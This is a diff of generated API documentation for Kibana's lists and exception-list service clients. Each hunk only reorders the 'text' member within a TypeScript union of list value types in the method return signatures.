@@ -1147,7 +1147,7 @@ "signature": [ "({ perPage, pit, page, searchAfter, sortField, sortOrder, valueListId, }: ", "FindValueListExceptionListsItems", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | undefined; comments: ({ 
comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -1219,7 +1219,7 @@ "signature": [ "({ filter, perPage, page, pit, searchAfter, sortField, sortOrder, }: ", "FindEndpointListItemOptions", - ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" + ") => Promise<({ data: { _version: string | undefined; comments: ({ comment: 
string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }) | null>" ], "path": "x-pack/plugins/lists/server/services/exception_lists/exception_list_client.ts", "deprecated": false, 
@@ -1668,7 +1668,7 @@ "signature": [ "({ id }: ", "GetListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -1704,7 +1704,7 @@ "signature": [ "({ id, deserializer, immutable, serializer, name, description, type, meta, version, }: ", "CreateListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -1740,7 +1740,7 @@ "signature": [ "({ id, deserializer, serializer, name, description, immutable, type, meta, version, }: ", "CreateListIfItDoesNotExistOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2232,7 +2232,7 @@ "signature": [ "({ id }: ", "DeleteListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2268,7 +2268,7 @@ "signature": [ "({ listId, value, type, }: ", "DeleteListItemByValueOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2304,7 +2304,7 @@ "signature": [ "({ id }: ", "DeleteListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2374,7 +2374,7 @@ "signature": [ "({ deserializer, serializer, type, listId, stream, meta, version, }: ", "ImportListItemsToStreamOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2408,7 +2408,7 @@ "signature": [ "({ listId, value, type, }: ", "GetListItemByValueOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2444,7 +2444,7 @@ "signature": [ "({ id, deserializer, serializer, listId, value, type, meta, }: ", "CreateListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2478,7 +2478,7 @@ "signature": [ "({ _version, id, value, meta, }: ", "UpdateListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2512,7 +2512,7 @@ "signature": [ "({ _version, id, name, description, meta, version, }: ", "UpdateListOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2546,7 +2546,7 @@ "signature": [ "({ id }: ", "GetListItemOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2582,7 +2582,7 @@ "signature": [ "({ type, listId, value, }: ", "GetListItemsByValueOptions", - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2618,7 +2618,7 @@ "signature": [ "({ type, listId, value, }: ", "SearchListItemByValuesOptions", - ") => Promise<{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]>" + ") => Promise<{ items: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; value: unknown; }[]>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2654,7 +2654,7 @@ "signature": [ "({ filter, currentIndexPosition, perPage, page, sortField, sortOrder, searchAfter, }: ", "FindListOptions", - ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" + ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2690,7 +2690,7 @@ "signature": [ "({ listId, filter, currentIndexPosition, perPage, page, sortField, sortOrder, searchAfter, }: ", "FindListItemOptions", - ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; } | null>" + ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; deserializer: string | undefined; id: string; list_id: string; meta: object | undefined; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; value: string; }[]; page: number; per_page: number; total: number; } | null>" ], "path": "x-pack/plugins/lists/server/services/lists/list_client.ts", "deprecated": false, 
@@ -2757,7 +2757,7 @@ "an array with the exception list item entries" ], "signature": [ - "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]" + "({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" 